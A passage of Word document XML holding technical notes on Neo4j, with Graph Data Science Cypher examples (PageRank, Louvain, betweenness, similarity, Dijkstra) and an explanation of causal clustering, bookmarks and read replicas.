    <w:p w14:paraId="1C5FF92B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E69A2C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Neo4j Graph Data Science library:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B562A0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="16956965" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>PageRank (node importance):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF9164A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Originally: Google's web page ranking algorithm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD90379" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Applications: influencer identification, fraud ring center detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72673D0E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9E24EA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  CALL gds.pageRank.stream('social_graph', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FB1554" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    maxIterations: 20,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596DF5C8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    dampingFactor: 0.85,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7AD152" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    relationshipTypes: ['FRIEND']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BD2490" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67305FC2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  YIELD nodeId, score</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D67F33" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  RETURN gds.util.asNode(nodeId).name AS name, score</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DAACAE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  ORDER BY score DESC LIMIT 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701F714A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014A1B2C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Community detection (Louvain, Label Propagation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1301210F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Identifies clusters of densely connected nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5DE729" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Applications: customer segmentation, fraud detection, recommendation groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0679E368" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D15BDE6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  CALL gds.louvain.stream('social_graph')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1622E9BA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  YIELD nodeId, communityId</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546D3323" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  RETURN communityId, COUNT(*) AS size, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4FAE80" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">         COLLECT(gds.util.asNode(nodeId).name)[..5] AS sample_members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E6527F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  ORDER BY size DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F79E7C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B87FEC6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Betweenness centrality:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B45B1FF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Nodes that lie on many shortest paths (bridges/brokers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCA42BA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Applications: supply chain critical nodes, network resilience analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796EB129" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268F58B3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  CALL gds.betweenness.stream('social_graph')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644A8698" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  YIELD nodeId, score</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1A5E92" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  RETURN gds.util.asNode(nodeId).name, score</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AAC95B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  ORDER BY score DESC LIMIT 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FB5205" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8658DD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Node similarity (Jaccard, Cosine):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330C13D4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Find nodes similar to a given node based on their connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71617FB5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Applications: "users like you also liked..." recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446D3ED6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1069CA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  CALL gds.nodeSimilarity.stream('purchase_graph', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B74040" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    topK: 10,  -- find top 10 similar nodes per node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F28B73B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    similarityCutoff: 0.5  -- minimum similarity threshold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580A466C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3C7DF8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  YIELD node1, node2, similarity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B959AD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  RETURN gds.util.asNode(node1).name, gds.util.asNode(node2).name, similarity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B21FBC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7839A0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Shortest path (Dijkstra, A*):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68479028" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Weighted shortest path with edge weights</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7230FD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Applications: routing, logistics, network path optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CE274F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C6F3E3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  MATCH (source:Location {name: 'New York'}),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498744C6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">        (target:Location {name: 'Los Angeles'})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65663CC4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  CALL gds.shortestPath.dijkstra.stream('road_network', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E360711" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    sourceNode: source,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B9E52E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    targetNode: target,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B99CC90" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    relationshipWeightProperty: 'distance'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2649624B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684C90A4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  YIELD path, totalCost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C55C2A9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  RETURN [node IN nodes(path) | node.name] AS route, totalCost AS distance_miles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6119BA7D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Neo4j Architecture — Causal Clustering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3314393C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E474E3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Neo4j Causal Cluster (production HA):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C64E3E2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="05873085" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Core members (Raft consensus group):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5D0282" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Typically 3 or 5 (odd number for quorum)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413604CD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Each is a full read-write server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50630291" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Leader: receives all writes, replicates to followers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01664334" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Followers: apply replicated transactions, can serve reads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2CE327" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14133107" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Causal consistency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4CA106" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Each transaction has a bookmark (sequence number)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CA47F4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Client receives bookmark after write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6037679B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Client presents bookmark to replica for subsequent read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488E8AD6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Replica checks: am I up to date with this bookmark?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F71124E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    If yes: serve read (guaranteed to see the write)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD7F6A7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    If no: wait until bookmark is applied, then serve read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1E46FA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4395A449" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Eliminates read-your-writes violations without routing all reads to leader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECC5896" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="606F6B0D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Read replicas (scale-out):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6AB587" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Not in Raft quorum — don't participate in commit decisions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C2D3C8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Subscribe to transaction stream from core cluster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A439465" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Apply transactions asynchronously (eventual consistency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA0C087" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Scale: add any number of read replicas (linear read throughput scaling)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B06F314" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A81FCE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Use case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D8FE00" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Core cluster: strong consistency, write throughput, HA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F950983" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Read replicas: scale reads for dashboards, reporting, search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539AB351" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DE0443" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Routing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10567661" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Neo4j driver: routing table from cluster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60081A6A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Writes: always routed to leader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EA30AC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Reads: routed to any core member or read replica (based on policy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0059FA00" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="16D8785E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
